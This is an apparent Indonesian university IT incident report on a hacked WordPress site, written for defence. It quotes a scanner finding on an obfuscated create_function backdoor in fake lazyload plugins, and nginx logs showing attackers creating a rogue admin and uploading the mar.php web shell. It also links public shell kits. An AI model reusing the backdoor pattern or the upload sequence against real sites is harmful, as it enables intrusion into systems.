
ojsv3.dinamikakesehatan.unism.ac.id + valid SSL certificate (request by mr. Faudji) untuk kebutuhan upgrade CMS jurnal.si.unism.ac.id. Terdapat beberapa backdoor yang berhasil disisipkan kedalam CMS. Berhasil dibersihkan dan sudah diamankan.
File: /var/www/si.unism.ac.id/htdocs/wp-content/plugins/wp-lazyload-wxcQXLzHGCPPNeFa-module/wp-lazyload.php
Exploits:
=> [!] Function (create_function) [line 9]
- Potentially dangerous function `create_function`
=> create_function('$value', gzuncompress(strrev(substr($data, 32))));$f(substr($data, 0, 32));__halt_compiler()
File: /var/www/si.unism.ac.id/htdocs/wp-content/plugins/wp-lazyload-RbX3MRakKPnvpn7N-module/wp-lazyload.php
Exploits:
=> [!] Function (create_function) [line 9]
- Potentially dangerous function `create_function`
=> create_function('$value', gzuncompress(strrev(substr($data, 32))));$f(substr($data, 0, 32));__halt_compiler()
cbt.kemdikbud.go.idps. Untuk test latensi dan speedtest ke server DIKTI, silakan akses https://noc.kemendikbud.go.id/
si.unism.ac.id telah berhasil disusupi dengan shell script. Namun, konfigurasi pada nginx berhasil memitigasi penyusupan ini, sehingga penyusup tidak dapat melakukan eskalasi lebih jauh dan tidak dapat melakukan remote command executions.Berdasarkan post-mortem log checking, penyusupan ini memiliki pola sebagai berikut:
cat /var/log/nginx/si.unism.ac.id.access.log.1 | grep seoplugin
37.19.223.106 - - [07/Oct/2022:10:28:09 +0800] si.unism.ac.id "GET /wp-content/plugins/seoplugins/mar.php HTTP/2.0" 403 106 "https://si.unism.ac.id/wp-admin/plugin-install.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0" "HTTP/2.0"
89.208.103.207 - - [07/Oct/2022:14:14:41 +0800] si.unism.ac.id "GET /wp-content/plugins/seoplugins/mar.php HTTP/2.0" 403 106 "https://si.unism.ac.id/wp-admin/plugin-install.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0" "HTTP/2.0"
37.19.223.110 - - [08/Oct/2022:09:37:27 +0800] si.unism.ac.id "GET /wp-content/plugins/seoplugins/mar.php HTTP/2.0" 403 106 "https://si.unism.ac.id/wp-admin/plugin-install.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0" "HTTP/2.0"
138.199.36.193 - - [08/Oct/2022:09:50:58 +0800] si.unism.ac.id "GET /wp-content/plugins/seoplugins/mar.php HTTP/2.0" 403 106 "https://si.unism.ac.id/wp-admin/plugin-install.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0" "HTTP/2.0"
84.239.40.227 - - [08/Oct/2022:09:57:30 +0800] si.unism.ac.id "GET /wp-content/plugins/seoplugins/mar.php HTTP/2.0" 403 106 "https://si.unism.ac.id/wp-admin/plugin-install.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0" "HTTP/2.0"
cat /var/log/nginx/si.unism.ac.id.access.log.1 | grep 37.19.223.106
37.19.223.106 0.123 - [07/Oct/2022:10:27:36 +0800] si.unism.ac.id "GET /wp-login.php HTTP/2.0" 200 2762 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0" "HTTP/2.0"
37.19.223.106 0.090 - [07/Oct/2022:10:27:36 +0800] si.unism.ac.id "POST /wp-login.php HTTP/2.0" 302 0 "https://si.unism.ac.id/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0" "HTTP/2.0"
37.19.223.106 0.872 - [07/Oct/2022:10:27:37 +0800] si.unism.ac.id "GET /wp-admin/ HTTP/2.0" 200 28920 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0" "HTTP/2.0"
37.19.223.106 0.314 - [07/Oct/2022:10:27:41 +0800] si.unism.ac.id "GET /wp-admin/user-new.php HTTP/2.0" 200 22168 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0" "HTTP/2.0"
37.19.223.106 0.288 - [07/Oct/2022:10:27:42 +0800] si.unism.ac.id "POST /wp-admin/user-new.php HTTP/2.0" 302 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0" "HTTP/2.0"
37.19.223.106 0.246 - [07/Oct/2022:10:27:43 +0800] si.unism.ac.id "GET /wp-admin/theme-install.php?upload HTTP/2.0" 200 24778 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0" "HTTP/2.0"
37.19.223.106 2.407 - [07/Oct/2022:10:28:04 +0800] si.unism.ac.id "POST /wp-admin/update.php?action=upload-theme HTTP/2.0" 200 19878 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0" "HTTP/2.0"
37.19.223.106 - - [07/Oct/2022:10:28:05 +0800] si.unism.ac.id "GET /wp-content/themes/seotheme/mar.php HTTP/2.0" 403 106 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0" "HTTP/2.0"
37.19.223.106 0.630 - [07/Oct/2022:10:28:06 +0800] si.unism.ac.id "GET /wp-admin/plugin-install.php?tab=upload HTTP/2.0" 200 21856 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0" "HTTP/2.0"
37.19.223.106 1.509 - [07/Oct/2022:10:28:08 +0800] si.unism.ac.id "POST /wp-admin/update.php?action=upload-plugin HTTP/2.0" 200 19829 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0" "HTTP/2.0"
37.19.223.106 - - [07/Oct/2022:10:28:09 +0800] si.unism.ac.id "GET /wp-content/plugins/seoplugins/mar.php HTTP/2.0" 403 106 "https://si.unism.ac.id/wp-admin/plugin-install.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0" "HTTP/2.0"
37.19.223.106 1.196 - [07/Oct/2022:10:28:10 +0800] si.unism.ac.id "POST /wp-admin/update.php?action=upload-plugin HTTP/2.0" 200 19796 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0" "HTTP/2.0"
37.19.223.106 - - [07/Oct/2022:10:28:11 +0800] si.unism.ac.id "GET /wp-content/uploads/mar.php HTTP/2.0" 403 106 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0" "HTTP/2.0"
37.19.223.106 - - [07/Oct/2022:10:28:11 +0800] si.unism.ac.id "GET /wp-content/uploads/2022/10/mar.php HTTP/2.0" 403 106 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0" "HTTP/2.0"
cat /var/log/nginx/si.unism.ac.id.access.log.1 | grep 89.208.103.207
89.208.103.207 0.135 - [07/Oct/2022:14:14:32 +0800] si.unism.ac.id "GET /wp-login.php HTTP/2.0" 200 2762 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0" "HTTP/2.0"
89.208.103.207 0.105 - [07/Oct/2022:14:14:32 +0800] si.unism.ac.id "POST /wp-login.php HTTP/2.0" 302 0 "https://si.unism.ac.id/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0" "HTTP/2.0"
89.208.103.207 0.254 - [07/Oct/2022:14:14:32 +0800] si.unism.ac.id "GET /wp-admin/ HTTP/2.0" 200 28921 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0" "HTTP/2.0"
89.208.103.207 0.324 - [07/Oct/2022:14:14:33 +0800] si.unism.ac.id "GET /wp-admin/user-new.php HTTP/2.0" 200 22162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0" "HTTP/2.0"
89.208.103.207 0.213 - [07/Oct/2022:14:14:35 +0800] si.unism.ac.id "POST /wp-admin/user-new.php HTTP/2.0" 200 22223 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0" "HTTP/2.0"
89.208.103.207 0.309 - [07/Oct/2022:14:14:36 +0800] si.unism.ac.id "GET /wp-admin/theme-install.php?upload HTTP/2.0" 200 24785 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0" "HTTP/2.0"
89.208.103.207 2.141 - [07/Oct/2022:14:14:39 +0800] si.unism.ac.id "POST /wp-admin/update.php?action=upload-theme HTTP/2.0" 200 20163 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0" "HTTP/2.0"
89.208.103.207 - - [07/Oct/2022:14:14:39 +0800] si.unism.ac.id "GET /wp-content/themes/seotheme/mar.php HTTP/2.0" 403 106 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0" "HTTP/2.0"
89.208.103.207 0.332 - [07/Oct/2022:14:14:39 +0800] si.unism.ac.id "GET /wp-admin/plugin-install.php?tab=upload HTTP/2.0" 200 21865 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0" "HTTP/2.0"
89.208.103.207 1.447 - [07/Oct/2022:14:14:41 +0800] si.unism.ac.id "POST /wp-admin/update.php?action=upload-plugin HTTP/2.0" 200 20205 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0" "HTTP/2.0"
89.208.103.207 - - [07/Oct/2022:14:14:41 +0800] si.unism.ac.id "GET /wp-content/plugins/seoplugins/mar.php HTTP/2.0" 403 106 "https://si.unism.ac.id/wp-admin/plugin-install.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0" "HTTP/2.0"
89.208.103.207 0.816 - [07/Oct/2022:14:14:42 +0800] si.unism.ac.id "POST /wp-admin/update.php?action=upload-plugin HTTP/2.0" 200 19814 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0" "HTTP/2.0"
89.208.103.207 - - [07/Oct/2022:14:14:42 +0800] si.unism.ac.id "GET /wp-content/uploads/mar.php HTTP/2.0" 403 106 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0" "HTTP/2.0"
89.208.103.207 - - [07/Oct/2022:14:14:42 +0800] si.unism.ac.id "GET /wp-content/uploads/2022/10/mar.php HTTP/2.0" 403 106 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0" "HTTP/2.0"
cat /var/log/nginx/si.unism.ac.id.access.log.1 | grep 138.199.36.193
138.199.36.193 0.122 - [08/Oct/2022:09:50:50 +0800] si.unism.ac.id "GET /wp-login.php HTTP/2.0" 200 2763 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0" "HTTP/2.0"
138.199.36.193 0.098 - [08/Oct/2022:09:50:50 +0800] si.unism.ac.id "POST /wp-login.php HTTP/2.0" 302 0 "https://si.unism.ac.id/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0" "HTTP/2.0"
138.199.36.193 0.454 - [08/Oct/2022:09:50:51 +0800] si.unism.ac.id "GET /wp-admin/ HTTP/2.0" 200 29722 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0" "HTTP/2.0"
138.199.36.193 0.275 - [08/Oct/2022:09:50:52 +0800] si.unism.ac.id "GET /wp-admin/user-new.php HTTP/2.0" 200 23296 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0" "HTTP/2.0"
138.199.36.193 0.203 - [08/Oct/2022:09:50:53 +0800] si.unism.ac.id "POST /wp-admin/user-new.php HTTP/2.0" 200 23359 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0" "HTTP/2.0"
138.199.36.193 0.329 - [08/Oct/2022:09:50:53 +0800] si.unism.ac.id "GET /wp-admin/theme-install.php?upload HTTP/2.0" 200 25923 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0" "HTTP/2.0"
138.199.36.193 1.439 - [08/Oct/2022:09:50:55 +0800] si.unism.ac.id "POST /wp-admin/update.php?action=upload-theme HTTP/2.0" 200 21330 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0" "HTTP/2.0"
138.199.36.193 - - [08/Oct/2022:09:50:55 +0800] si.unism.ac.id "GET /wp-content/themes/seotheme/mar.php HTTP/2.0" 403 106 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0" "HTTP/2.0"
138.199.36.193 0.342 - [08/Oct/2022:09:50:56 +0800] si.unism.ac.id "GET /wp-admin/plugin-install.php?tab=upload HTTP/2.0" 200 22996 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0" "HTTP/2.0"
138.199.36.193 1.532 - [08/Oct/2022:09:50:57 +0800] si.unism.ac.id "POST /wp-admin/update.php?action=upload-plugin HTTP/2.0" 200 21372 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0" "HTTP/2.0"
138.199.36.193 - - [08/Oct/2022:09:50:58 +0800] si.unism.ac.id "GET /wp-content/plugins/seoplugins/mar.php HTTP/2.0" 403 106 "https://si.unism.ac.id/wp-admin/plugin-install.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0" "HTTP/2.0"
138.199.36.193 0.805 - [08/Oct/2022:09:50:58 +0800] si.unism.ac.id "POST /wp-admin/update.php?action=upload-plugin HTTP/2.0" 200 21014 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0" "HTTP/2.0"
138.199.36.193 - - [08/Oct/2022:09:50:59 +0800] si.unism.ac.id "GET /wp-content/uploads/mar.php HTTP/2.0" 403 106 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0" "HTTP/2.0"
138.199.36.193 - - [08/Oct/2022:09:50:59 +0800] si.unism.ac.id "GET /wp-content/uploads/2022/10/mar.php HTTP/2.0" 403 106 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0" "HTTP/2.0"
cat /var/log/nginx/si.unism.ac.id.access.log.1 | grep mar.php
157.245.54.120 - - [06/Oct/2022:23:27:44 +0800] si.unism.ac.id "GET /images/mar.php HTTP/2.0" 444 0 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" "HTTP/2.0"
37.19.223.106 - - [07/Oct/2022:10:28:05 +0800] si.unism.ac.id "GET /wp-content/themes/seotheme/mar.php HTTP/2.0" 403 106 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0" "HTTP/2.0"
37.19.223.106 - - [07/Oct/2022:10:28:09 +0800] si.unism.ac.id "GET /wp-content/plugins/seoplugins/mar.php HTTP/2.0" 403 106 "https://si.unism.ac.id/wp-admin/plugin-install.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0" "HTTP/2.0"
37.19.223.106 - - [07/Oct/2022:10:28:11 +0800] si.unism.ac.id "GET /wp-content/uploads/mar.php HTTP/2.0" 403 106 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0" "HTTP/2.0"
37.19.223.106 - - [07/Oct/2022:10:28:11 +0800] si.unism.ac.id "GET /wp-content/uploads/2022/10/mar.php HTTP/2.0" 403 106 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0" "HTTP/2.0"
89.208.103.207 - - [07/Oct/2022:14:14:39 +0800] si.unism.ac.id "GET /wp-content/themes/seotheme/mar.php HTTP/2.0" 403 106 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0" "HTTP/2.0"
89.208.103.207 - - [07/Oct/2022:14:14:41 +0800] si.unism.ac.id "GET /wp-content/plugins/seoplugins/mar.php HTTP/2.0" 403 106 "https://si.unism.ac.id/wp-admin/plugin-install.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0" "HTTP/2.0"
89.208.103.207 - - [07/Oct/2022:14:14:42 +0800] si.unism.ac.id "GET /wp-content/uploads/mar.php HTTP/2.0" 403 106 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0" "HTTP/2.0"
89.208.103.207 - - [07/Oct/2022:14:14:42 +0800] si.unism.ac.id "GET /wp-content/uploads/2022/10/mar.php HTTP/2.0" 403 106 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0" "HTTP/2.0"
37.19.223.110 - - [08/Oct/2022:09:37:25 +0800] si.unism.ac.id "GET /wp-content/themes/seotheme/mar.php HTTP/2.0" 403 106 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0" "HTTP/2.0"
37.19.223.110 - - [08/Oct/2022:09:37:27 +0800] si.unism.ac.id "GET /wp-content/plugins/seoplugins/mar.php HTTP/2.0" 403 106 "https://si.unism.ac.id/wp-admin/plugin-install.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0" "HTTP/2.0"
37.19.223.110 - - [08/Oct/2022:09:37:28 +0800] si.unism.ac.id "GET /wp-content/uploads/mar.php HTTP/2.0" 403 106 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0" "HTTP/2.0"
37.19.223.110 - - [08/Oct/2022:09:37:28 +0800] si.unism.ac.id "GET /wp-content/uploads/2022/10/mar.php HTTP/2.0" 403 106 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0" "HTTP/2.0"
138.199.36.193 - - [08/Oct/2022:09:50:55 +0800] si.unism.ac.id "GET /wp-content/themes/seotheme/mar.php HTTP/2.0" 403 106 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0" "HTTP/2.0"
138.199.36.193 - - [08/Oct/2022:09:50:58 +0800] si.unism.ac.id "GET /wp-content/plugins/seoplugins/mar.php HTTP/2.0" 403 106 "https://si.unism.ac.id/wp-admin/plugin-install.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0" "HTTP/2.0"
138.199.36.193 - - [08/Oct/2022:09:50:59 +0800] si.unism.ac.id "GET /wp-content/uploads/mar.php HTTP/2.0" 403 106 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0" "HTTP/2.0"
138.199.36.193 - - [08/Oct/2022:09:50:59 +0800] si.unism.ac.id "GET /wp-content/uploads/2022/10/mar.php HTTP/2.0" 403 106 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0" "HTTP/2.0"
84.239.40.227 - - [08/Oct/2022:09:57:28 +0800] si.unism.ac.id "GET /wp-content/themes/seotheme/mar.php HTTP/2.0" 403 106 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0" "HTTP/2.0"
84.239.40.227 - - [08/Oct/2022:09:57:30 +0800] si.unism.ac.id "GET /wp-content/plugins/seoplugins/mar.php HTTP/2.0" 403 106 "https://si.unism.ac.id/wp-admin/plugin-install.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0" "HTTP/2.0"
84.239.40.227 - - [08/Oct/2022:09:57:31 +0800] si.unism.ac.id "GET /wp-content/uploads/mar.php HTTP/2.0" 403 106 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0" "HTTP/2.0"
84.239.40.227 - - [08/Oct/2022:09:57:31 +0800] si.unism.ac.id "GET /wp-content/uploads/2022/10/mar.php HTTP/2.0" 403 106 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0" "HTTP/2.0"
+----+------------+-----------------+--------------------------+---------------------+---------------+
| ID | user_login | display_name | user_email | user_registered | roles |
+----+------------+-----------------+--------------------------+---------------------+---------------+
| 2 | eni*** | Eni*** | xxxxxxxxxxxxxx@gmail.com | 2021-10-08 03:10:05 | author |
| 4 | main****** | main****** | xxxxx@unism.ac.id | 0000-00-00 00:00:00 | administrator |
| 3 | rus**** | rus**** rus**** | xxxxxxxxx@gmail.com | 2021-10-11 06:30:23 | administrator |
| 1 | ****min | admin | xx@outlook.co.id | 2019-01-13 11:40:46 | administrator |
| 5 | wadminw | wadminw | wadminw@wordpress.com | 2022-10-07 02:27:41 | administrator | <- malicious user
+----+------------+-----------------+--------------------------+---------------------+---------------+
- ditemukan marijuana shell (https://0x5a455553.github.io/MARIJUANA/)
- ditemukan gel4y shell (https://github.com/22XploiterCrew-Team/Gel4y-Mini-Shell-Backdoor)
si.unism.ac.id
si.unism.ac.idIN152513265)